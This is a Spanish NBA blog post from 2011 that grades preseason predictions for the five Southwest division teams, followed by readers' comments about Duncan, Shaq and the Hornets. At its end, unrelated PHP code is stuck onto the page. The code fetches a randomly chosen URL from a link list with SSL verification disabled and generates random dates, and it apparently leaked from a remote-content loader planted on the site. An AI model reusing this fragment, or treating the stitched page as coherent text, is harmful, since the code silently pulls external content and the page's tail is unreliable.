Revisando pronósticos 2011: Southwest

09 de February de 2011 por Viva_Dirk

SAN ANTONIO SPURS

Pronóstico Septiembre 2010: 1ª ronda
Probabilidad de acierto:
Muy baja
Calificación pronóstico:
D
Análisis

Actualmente son el mejor equipo de la temporada y resulta difícil imaginar que no lo continúen siendo al finalizar los 82 partidos, de la liga regular. Y aún más difícil resulta pensar que vayan a caer en primera ronda de play-offs. Uno de los problemas que preveíamos a principio de temporada era la salud de sus jugadores. Ningún problema. El quinteto titular de los Spurs, formado por Duncan, Ginobili, Parker, Jefferson y Blair, ha jugado los 50 partidos disputados por su equipo, ahí es nada. Además Hill, Neal, Bonner y McDyess cumplen a la perfección sus papeles secundario, lo que está permitiendo que las veteranas estrellas no lleguen a los 33 minutos por encuentro, otro punto que preocupaba a principio de año.

Con el duo exterior Parker-Ginobili rindiendo al máximo nivel y promediando entre ambos 36 puntos, 7 rebotes, 11.6 asistencias y 3 robos por partido, Tim Duncan ha podido reciclarse para completar labores de intendencia tales como convertirse en una pesadilla en defensa o cargar el rebote ofensivo, algo en lo que DeJuan Blair es una grandísima ayuda, con un juego muy complementario al del viejo McDyess. Jefferson esta sólido como hacía tiempo que no se le veía, Bonner está en un 50% desde la linea de 3, y tanto Hill como Neal son capaces de encender un partido sin bajar el nivel defensivo. Con todos los jugadores cumpliendo a la perfección el cometido que Popovich les asigna, los Spurs se convierten en un rodillo total.

DALLAS MAVERICKS

Pronóstico Septiembre 2010: Entre los 4 primeros del Oeste. Final de conferencia.
Probabilidad del pronóstico: Media
Calificación pronóstico: C
Análisis

Marchan segundos casi empatados con los Lakers y con cierta ventaja sobre el cuarto clasificado, algo que han conseguido después de salir de la crisis que supuso la lesión de Caron Butler para toda la regular season y la ausencia más larga de Nowitzki en los últimos 10 años. Hasta la lesión del alero, los Mavs tenían un récord de 24-5 y realmente parecían capaces de pelear por el primer puesto de la conferencia, algo que ahora parece imposible.

La principal novedad por la que en Dallas funcionan mejor las cosas es la buena temporada de Tyson Chandler, que resulta ser un gran complemento para Dirk Nowitzki. El alemán está completando un gran año a nivel anotador con altísimos porcentajes, pero no parece recuperado del todo de sus molestias y no va a tener tiempo de descansar demasiado. Con la edad que tiene, a Jason Kidd no se le puede pedir demasiado. De todas maneras, sigue haciendo jugar muy bien a sus compañeros y es una inestimable ayuda en el rebote pero cada vez tiene mas difícil anotar con solvencia y parar a bases mas jóvenes que él. Por su parte, Terry, Marion y Barea forman una de las mejores segundas unidades del campeonato. Finalmente, las aspiraciones reales de los Mavs parecen ancladas en una eliminatoria frente a Spurs o Lakers si no cuentan con un Caron Butler a buen nivel. Con él recuperado se convierten en un rival temible.

NEW ORLEANS HORNETS

Pronóstico Septiembre 2010: Últimas posiciones del Oeste.
Probabilidad de acierto: Ninguna
Calificación del pronóstico: C-
Análisis

Absoluta sorpresa la protagonizada por los Hornets que tienen como objetivo actual el de conseguir el factor cancha a favor en play-offs. Luchan para ello con los Thunders, un equipo que parecía, a priori,  muy superior. Con un sólido quinteto, un banquillo hecho a base de descartes y una de las rotaciones interiores más cortas de la liga están peleando con el equipo de moda, plantando cara a todos los cocos y haciendo de su defensa una potentísima arma.

No podemos negar que pese a todo, el motivo número 1 por el que los Hornets están en esta situación se llama Chris Paul. El pequeño base está completando una temporada excelsa, ya que a unos porcentajes de tiro muy altos, une el mejor ratio asistencias/pérdidas de la liga y lidera el apartado de robos. Candidato sin duda al MVP. Su habitual compañero David West sigue haciendo lo que sabe: anotar todo lo posible en un equipo donde no sobra el talento, dejando para Emeka Okafor las tareas más oscuras, las cuales cumple de manera brillante. Trevor ‘Mr.Energy’ Ariza es una gran pieza para este puzzle. Aprovecha todas sus cualidades físicas para ser uno de los mejores defensores de la liga y es un seguro de vida a campo abierto aunque en ataque estático aporta pocas soluciones. Marco Belinelli ha encontrado un lugar donde necesitan sus habilidades y cubren sus defectos y, para cuando tiene un mal dia, Marcus Thornton y Willie Green no tienen problema en ocupar su rol. Por último, destacar la temporada para la esperanza de Jason Smith.

MEMPHIS GRIZZLIES

Pronóstico Septiembre 2010: Creo que es el equipo que más puede depender de otros. Si Oden o Yao se resienten de sus lesiones, los veo jugando postemporada. Si no, 9º-10º en el Oeste.
Probabilidad de acierto:
Alta
Calificación pronóstico:
A
Análisis

Estarán peleando hasta el final por entrar en la post-temporada junto a Portland, Houston y veremos si Denver. Comenzaron el año con la renovación desorbitada de Mike Conley, el cual recibe un salario muy por encima de su rendimiento, y lo terminarán teniendo que afrontar las renovaciones de Zach Randolph y Marc Gasol, que viendo lo que ha firmado el base deberían exigir un auténtico montón de pasta.

Rudy Gay y Zach Randolph son posiblemente la mejor pareja de forwards en el aspecto ofensivo de la liga. Entre ambos suman 40 puntos y 19 rebotes por noche, y en el caso del alero ha dado una nueva dimensión a su juego aumentando su aportación en el resto de facetas. Tanto Conley como Gasol están haciendo temporadas correctas pero irregulares. En el caso del base de más a menos y en el caso del pívot de menos a más. El gran problema lo vemos en el puesto de escolta donde OJ Mayo está resultando ser una de las grandes decepciones de la temporada. Un jugador de su talento no puede ser noticia por altercados que nada tienen que ver con su juego, lo que además dificulta un posible traspaso. Tony Allen, Darrell Arthur y Sam Young aportan lo que puede esperarse de ellos, mientras que los rookies Henry y Vasquez han dejado muestra de sus cualidades pero necesitarán tiempo. Mucho menos, de todos modos, del que parece necesitar Hasheem Thabeet del que no podemos comentar ni una sola noticia positiva.

HOUSTON ROCKETS

Pronóstico Septiembre 2010: Con ellos me la tengo que jugar: Podrían ser el rival más difícil de Lakers en la conferencia Oeste. (Finalistas de Conferencia)
Probabilidad de acierto:
Muy baja
Calificación pronóstico:
C-
Análisis

Cinco es el número de partidos que ha disputado Yao Ming esta temporada y que huelen a retirada del deporte de élite. Más pendientes del jugador chino que de otra cosa empezaron la temporada en Houston, lo que se transformó en horribles resultados, agravados con una lesión de Aaron Brooks que lo ha mantenido alejado de las canchas más de 20 partidos.

Mejor que no piensen mucho en lo que habría podido ser porque las temporadas de Luis Scola y Kevin Martin son inmejorables. El argentino, al contrario que otros muchos, parece haberle salido barato a Houston. Sus 19.4 puntos y 8.3 rebotes por noche valen mucho más de lo que ha firmado este verano. Por su parte, Martin está disfrutando de un año sin lesiones, anotando mucho como en él es habitual aunque con porcentajes mas bajos que de costumbre. Ante la baja de Brooks han encontrado en Lowry un base más clásico y posiblemente más adecuado a las características de sus 2 estrellas, a las que también se adaptan perfectamente Shane Battier y Chuck Hayes, ambos con grandes limitaciones. Desde el banco los jóvenes Budinger, Lee y Hill aportan intensidad mientras Brad Miller suma veteranía. Estamos a la expectativa ante las evoluciones de Pattrick Patterson, que junto con Budinger es lo que podría mejorar el rendimiento de esta plantilla.

Imágenes | AP-Photos / Getty Images

Comenta

8 comentarios a esta entrada

  1. Scriers dice:
    #1

    Hombre, Lowry tampoco es que sea un base clásico, mas bien un kamikaze que ha aprendido cuando sí y cuando no.
    y randolph y gay son mucha telita, quien le iba a decir a memphis que iba a tener 2 pedazos de jugadores a nivel anotador. lastima que flojeen un poco en defensa.

      Citar

  2. Sancho88 dice:
    #2

    Bueno, en el análisis de los Spurs, por un lado se daba por muerto a Duncan (crasso error), pero por otra parte se blindaban los flancos diciendo que no había que subestimar a los del Álamo (gran acierto). El año pasado fue para olvidar para San Antonio y de eso, los primeros que son conscientes son los propios Manu, Duncan y Parker. Entre las lesiones, la caraja de Jefferson (ojito con él, pues es realmente el cuarto vértice de este rombo) y la difícil adaptación a la liga de Blair o Hill no fue de extrañar el ‘topetazo’ en segunda ronda frente a Phoenix.
    En cuanto al momento actual de los tejanos, es muy interesante la mezcla entre veteranía y juventud que ha logrado compactar Greg Popovich. Personalmente, me encanta George Hill, un chico que sabe hacer de todo, super rápido y muy buen defensor, con una mano aceptable, ideal para el juego en equipo. Con una hipotética lesión (nadie lo quiere, después del temporadón que nos están haciendo disfrutar) de Parker o Manu, Hill podría tapar su puesto con bastantes garantías. Phill Jackson tiene en los Lakers un jugador que podría rendir como Hill pero que usa muy marginalmente, me refiero a Shannon Brown. Pero bueno, después de tantos años no creo que cambie su mecánica de trabajo, está claro que le gustan los bases triplistas que no meten triples (todos sabemos a quienes me estoy refiiriendo) y pasa de un jugador de la categoria de Shannon.
    Y, en el análisis de Houston… normal que se viera como un duro rival con Yao. Lástima que lo haya tenido que dejar. Hace un par de meses, creo recordar, compararon en la revista NBA los casos de Ming e Ilgauskas, que parece ser también sufrió la misma lesión que Ming, estuvo dos años fuera de combate y mira, luego volvio a los Cavs y se marcó un par de temporadas en 18-10 o por ahí. Por tanto, si aún palpita el milagro, aunque sea un 5% o menos de probabilidades… joder, molaría ver de nuevo a la ‘Gran Muralla China’.
    Y bueno, para terminar, muy destacable en esta división el papel de los Hornets de Monty Williams. Ha montado un equipo desde la defensa con muy buena pinta. Para mí, Paul es la sensación del Oeste en cuanto a dirección de juego (en dura pugna con Tony Parker) y en el Este, claramente Derrick Rose. Realmente, con lo poquito que parecen tener los Hornets, es sorprendente la gran temporada que están haciendo. Chapeau!
    Y nada más que comentar chicos. Realmente esta página es un gran lugar de reflexión para los que amamos esta liga. Haceis un gran trabajo todos los días.
    Muchas gracias por ello.
    Sólo un fallo: ¡¡Por favor!! Blake Griffin debería ser expulsado de la sección: El premio al mejor novato del día, de vuestras crónicas. Nos ha engañado a todos y mientras estuvo lesionado el año pasado se fue con Vegeta y Trunks al palacio ese donde entrenas un año y sales y sólo ha pasado un día. Si no, es imposible de explicar este chico. 🙂

      Citar

  3. TheDeerHunter dice:
    #3

    Un matiz. El pronóstico no pretendía dar por enterrado a Duncan. Creo que los que me leéis habitualmente (y está escrito en un montón de comentarios) que no creo ni de lejos que esté enterrado ni que en ningún momento lo haya estado. Lo que yo entierro es una era en la que Duncan era un dios. Y esa era claro que está enterrada y bien al fondo. Sin un Duncan dominante (ya no lo es) el equipo tenía muchísimas incógnitas que resolver, pero da la casualidad que todas las ha despejado positivamente. Todo le ha ido de cara al equipo de Popovic. No ha sido así en ninguno de sus rivales de camino al hipotético título.
    Nadie podía esperar un Ginobili a nivel all-star (sólo inferior a Kobe en su conferencia), una salud sin precedentes los últimos años en su big three (cuidado con eso, porque aún podría ser un factor a la hora de calificar mi pronóstico al final del curso, han recuperado a Jefferson, han encontrado en Blair el complemento perfecto de Duncan y encima jugando de center con su altura, les ha tocado la lotería con Gary Neal… pero cualquiera que salta a cancha produce. Es que Splitter es el jugador nº10, por dios!!! y McDyess el 9.
    De todas formas yo aún no los veo como seguros finalistas del Este. Sí bastante probables y más con su genética de campeones.

    De Houston qué voy a decir. Que con Yao sí me parecen un equipo muy potente sobre el papel. Me la jugué porque rara vez he visto tanta mala suerte instalada durante tantos años seguidos. Pensaba que este año podía tocar la flauta y con el chino sano lo seguiría viendo un equipo potentísimo sobre el papel. El quinteto Brooks-Martin-Battier-Scola-Yao hubiera sido tela fina. Y el banco también. Lo hemos visto.

      Citar

  4. Uno cualquiera dice:
    #4

    No te culpo Deer, yo tampoco los veo aún como seguros finalistas del ESTE (jajajaja es broma).

      Citar

  5. TheDeerHunter dice:
    #5

    jajajaja
    como estáis al acecho para sacarme los ojos

      Citar

  6. Sancho88 dice:
    #6

    Discrepo de nuevo. Duncan es dominante. Lo lleva en los genes y en buenas condiciones creo que este año en playoff nos lo demostrará. Voy a poner un ejemplo: Shaq. 2005. Se va de Lakers, llega a Miami. Con su carreta de años encima, creo que 34 igual que Duncan. Se dice que ya no es dominante. El anillo…

    Eh, pero que es solo mi opinión eh? respeto totalmente la tuya.

      Citar

  7. TheDeerHunter dice:
    #7

    Hombre, a ver… yo he defendido la presencia de Duncan para el all-star. Y desde luego que defendí la de Shaq en aquel momento…

    De todos modos son casos al mismo tiempo similares… y también diferentes. Me explico:
    Shaq en Miami no ganó el anillo. Lo gano Wade, que no es lo mismo… y con un buen equipo detrás diseñado específicamente para ganar el anillo ese mismo año: Jason Williams, Antawn Walker, Alonzo, Payton, Posey, Haslem… y aún así tuvieron una buena dosis de coña remontando la final. Pero es lo de menos.

    ¿Shaq dominaba?? Un 20-9 no está nada mal para muchos jugadores. Pero quien ha visto a Shaq dominar no piensa que lo haga con un 20-9… Dominaba cuando hacía un 30-15 y ese era el verdadero perro gordo. El otro fue la versión mundana de Shaq… y la versión vulnerable como ya se había visto el año pasado contra un tío de 20cm menos de altura y unas cuantas decenas menos de kilos, y se vió ese mismo año con una final claramente mejorable(ya ni te cuento los siguientes)

    Las estadísticas de Duncan son 13,5-9… así que figúrate. Pero no creas que no valoro lo que hace… todo lo contrario. Lo importante que es no se ve en esos números… pero eso no quita que la época en que salir con Duncan y 4 más significaba prácticamente la victoria contra cualquiera terminó definitivamente. Ley de vida. Hoy no sólo que en ocasiones no domina sino que en algunas otras es dominado. Sin ir más lejos el otro día le cayó una de Aldridge para flipar. A ver si el Duncan de antes hubiera permitido eso.

      Citar

  8. telekoman dice:
    #8

    Yo al que hecho de menos es a Splitter. Creo que cuando Popovich le da bola, el tío cumple bien. Y creo que debería de ser el recambio de presente cercano – futuro de Duncan, pero si se lo permiten.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>